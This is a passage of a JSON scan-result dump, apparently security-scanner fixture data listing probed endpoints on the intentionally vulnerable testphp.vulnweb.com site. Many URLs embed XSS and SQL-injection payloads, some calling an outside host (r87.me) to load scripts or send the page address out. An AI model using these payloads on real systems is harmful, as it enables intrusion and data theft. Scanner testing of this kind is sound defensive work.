"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=3&p=%3CiMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d''%3bthis.src%3d'%2f%2fmv9e8mbvffdujmqnumt1bjkxifmvoyfr6vtb3zin'%2b'jak.r87.me%2fr%2f%3f'%2blocation.href%22%3E&pp=12CONFIRMED", + "content_length": 153, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:32.906Z", + "response_time": 0.339560629, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1672, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?p=%3Cscript", + "content_length": 7, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:33.167Z", + "response_time": 0.355579181, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1676, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?p=CWS%07%0E000x%9C=%8D1N%C3%40%10E%DF%AE%8D%BDI%08", + "content_length": 24, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:33.654Z", + "response_time": 0.34685902700000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1677, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?p=CWS%07%0E000x%9C=%8D1N%C3%40%10E%DF%AE%8D%BDI%08)%D3%40%1D%A0%A2%05%09%11%89HiP", + "content_length": 37, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:33.778Z", + "response_time": 0.352366649, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1678, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?p=CWS%07%0E000x%9C=%8D1N%C3%40%251", + "content_length": 18, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:33.910Z", + "response_time": 0.338480053, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1679, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=%27%22--%3E%3C%2Fst", + "content_length": 14, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:34.039Z", + "response_time": 0.3390317, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1680, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%25", + "content_length": 28, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:34.197Z", + "response_time": 0.34487051, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1681, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt+src%3D%22%2F%2Fmv9e8mbvffulk1i0duvujvkdkktmkntnztbb8kejrja%26%2346%3Br87%26%2346%3Bme%22%3E%3C%2FscRipt%3E", + "content_length": 111, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:34.315Z", + "response_time": 0.342875901, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1682, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?p=valid&pp='", + "content_length": 6, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:34.433Z", + "response_time": 0.350980511, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1683, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12", + "content_length": 7, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:36.937Z", + "response_time": 0.355580278, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1684, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12&aaaa%2f", + "content_length": 7, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:37.088Z", + "response_time": 0.356611259, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1685, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12A01", + "content_length": 10, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:37.208Z", + "response_time": 0.356759354, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1686, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12Connection%3A", + "content_length": 18, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:37.333Z", + "response_time": 0.35046188899999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1687, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12Connection:", + "content_length": 18, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:37.535Z", + "response_time": 0.342701296, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1688, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12User-Agent%3A", + "content_length": 18, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:37.885Z", + "response_time": 0.357145506, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1689, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12User-Agent:", + "content_length": 18, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:38.011Z", + "response_time": 0.354772752, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1690, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12has", + "content_length": 10, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:38.150Z", + "response_time": 0.352542037, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1691, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=aaa", + "content_length": 8, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:38.678Z", + "response_time": 0.348096158, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1692, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=aaa%22bbb", + "content_length": 12, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:38.836Z", + "response_time": 0.346511501, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1693, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=x", + "content_length": 6, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:40.455Z", + "response_time": 0.34309151400000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1694, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=x%22+onmouseove", + "content_length": 18, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:41.554Z", + "response_time": 0.352747541, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1695, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=x%22+onmouseover%3Dalert%280x106ED2", + "content_length": 34, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:41.825Z", + "response_time": 0.340113418, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1696, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=x%22+onmouseover%3Dalert%280x106ED2%29+x%3D%22", + "content_length": 39, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:42.142Z", + "response_time": 0.35761741799999996, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1697, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=x%22+onmouseover%3Dnetsparker%280x00333D", + "content_length": 39, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:42.902Z", + "response_time": 0.351765724, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1698, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=x%22+onmouseover%3Dnetsparker%280x00333D%29+x%3D%22", + "content_length": 44, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:43.049Z", + "response_time": 0.36061548, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1699, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=x%22+onmouseover%3Dnetsparker%280x106ED2", + "content_length": 39, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:43.188Z", + "response_time": 0.34430029, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1710, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/images/logo.gif", + "content_length": 6660, + "page_title": null, + "http_status": 200, + "content_type": "image/gif", + "discovered_date": "2024-11-13T02:24:44.561Z", + "response_time": 0.349399978, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1712, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/images/remark.gif", + "content_length": 79, + "page_title": null, + "http_status": 200, + "content_type": "image/gif", + "discovered_date": "2024-11-13T02:24:44.776Z", + "response_time": 0.338196867, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1722, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/index.zip", + "content_length": 2586, + "page_title": null, + "http_status": 200, + "content_type": "application/zip", + "discovered_date": "2024-11-13T02:24:49.191Z", + "response_time": 0.172853957, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1731, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php", + "content_length": 4819, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:53.714Z", + "response_time": 0.355434198, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1734, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist", + "content_length": 4975, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:54.128Z", + "response_time": 0.345497235, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1735, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?-", + "content_length": 4819, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:54.291Z", + "response_time": 0.35695743900000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1736, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist=%3Cifram", + "content_length": 4982, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:54.449Z", + "response_time": 0.340932551, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1737, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist=%3Ciframe%20src%3d%22%2f%2fmv", + "content_length": 4993, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:54.606Z", + "response_time": 0.348305663, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1738, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist=%3Ciframe%20src%3d%22%2f%2fmv9e8mbvffhnljeuznntumzdcj12cbq-dn-_jxrwote%26%2346%3br87%26%2346%3bme%22%3E%3C%2fiframe%3E", + "content_length": 5055, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:54.756Z", + "response_time": 0.342049, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1739, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist=%3CscRip", + "content_length": 4982, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:54.907Z", + "response_time": 0.339967662, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1740, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist=%3CscRipt%3Ealert(0x106C07", + "content_length": 4998, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:55.079Z", + "response_time": 0.345178479, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1741, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist=%3CscRipt%3Ealert(0x106C07)%3C%2fscRipt%3E", + "content_length": 5008, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:55.241Z", + "response_time": 0.353222449, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1742, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist=%3CscRipt%3Enetsparker(0x004DC", + "content_length": 5002, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:55.402Z", + "response_time": 0.344105498, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1743, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist=%3CscRipt%3Enetsparker(0x004DC0", + "content_length": 5003, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:57.651Z", + "response_time": 0.356968056, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1744, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist=%3CscRipt%3Enetsparker(0x004DC0)%3C%2fscRipt%3E", + "content_length": 5013, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:57.808Z", + "response_time": 0.343565586, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1745, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist=%3CscRipt%3Enetsparker(0x106C07", + "content_length": 5003, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:57.961Z", + "response_time": 0.34900721700000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1746, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist='", + "content_length": 4976, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:58.120Z", + "response_time": 0.354063609, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1747, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist=1", + "content_length": 7994, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:58.275Z", + "response_time": 0.35717608300000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1748, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist=1%20OR%2017-7%3d10CONFIRMED", + "content_length": 4875, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:58.642Z", + "response_time": 0.34742865, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1749, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist=1%20OR%2017-7%3d10", + "content_length": 49413, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:58.793Z", + "response_time": 0.346739933, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1751, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Csvg%2Fclass%3D%22dalfox%22onLoad%3Dalert%2845%29%3E", + "content_length": 4699, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:24:59.396Z", + "response_time": 0.349431733, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1753, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Csvg%2Fclass%3D%22dalfox%22onLoad%3Dalert%2845%29%3E", + "content_length": 5013, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:01.181Z", + "response_time": 0.35305168200000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1754, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123DalFox", + "content_length": 4873, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:02.265Z", + "response_time": 0.341633688, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1756, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist=14Database", + "content_length": 4874, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:02.857Z", + "response_time": 0.349015171, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1757, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist=14DatabaseManipulationsSQL", + "content_length": 4890, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:03.608Z", + "response_time": 0.345222466, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1758, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist=14DatabaseManipulations", + "content_length": 4887, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:03.762Z", + "response_time": 0.34933477599999996, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1759, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?artist=1A01", + "content_length": 4868, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:03.906Z", + "response_time": 0.349784492, + "webserver": 